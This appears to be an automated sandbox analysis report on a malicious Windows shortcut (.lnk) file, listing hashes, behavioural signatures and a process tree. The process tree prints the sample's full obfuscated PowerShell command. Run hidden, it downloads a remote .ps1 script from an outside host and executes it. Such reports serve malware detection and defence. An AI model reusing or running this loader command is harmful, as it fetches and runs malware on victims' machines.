Analysis
-
max time kernel
122s -
max time network
124s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
27-11-2024 03:00
Static task
static1
Behavioral task
behavioral1
Sample
c2c5837094cd8de442e49235887ce10e31e9f7ccc39af67235cfd548e7a1a177.lnk
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
c2c5837094cd8de442e49235887ce10e31e9f7ccc39af67235cfd548e7a1a177.lnk
Resource
win10v2004-20241007-en
General
-
Target
c2c5837094cd8de442e49235887ce10e31e9f7ccc39af67235cfd548e7a1a177.lnk
-
Size
2KB
-
MD5
4a658619a07a5237c0e85b75bf14e644
-
SHA1
089a04cc3a66c5b86ddbb6a481c5ab8702c1e621
-
SHA256
c2c5837094cd8de442e49235887ce10e31e9f7ccc39af67235cfd548e7a1a177
-
SHA512
88e0b970b2da52b263ecd6008a58df1094ce1acac03bd1358afad0d99daa6c3f89c32122451a3f6632f42db70541b3982ecaff046eda569968ed6ffd2879a394
Malware Config
Signatures
-
Blocklisted process makes network request 3 IoCs
flow pid Process 5 2932 powershell.exe 6 2932 powershell.exe 7 2932 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2932 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2932 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2932 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2440 wrote to memory of 2932 2440 cmd.exe 31 PID 2440 wrote to memory of 2932 2440 cmd.exe 31 PID 2440 wrote to memory of 2932 2440 cmd.exe 31
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\c2c5837094cd8de442e49235887ce10e31e9f7ccc39af67235cfd548e7a1a177.lnk1⤵
- Suspicious use of WriteProcessMemory
PID:2440 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -command &{$ty = 'dvn7d#Jt' + 'Bdj*cjU' + 'bn^v45F' + 'hjw#dhC' + 'ghi576_f#Ky' + 'jh9fKJ'; [string] $aCmd = {(New-xwzObject Nxwzetxwz.WebCxwzlient).DoxwzwnlxwzoadxwzStrxwzinxwzg('ht' + 'tp:/' + '/paxwzn' + 'axwzkxwzeosxwz' + 'xwz.icxwzu/scxwzripxwzts/scxwz-inxwzt' + 'exwzrmexwzdiatxwze.xwzpsxwz1')}; $rCmd = $aCmd.replace('xwz', ''); $finalExec = iex $rCmd; iex $finalExec; }2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2932
-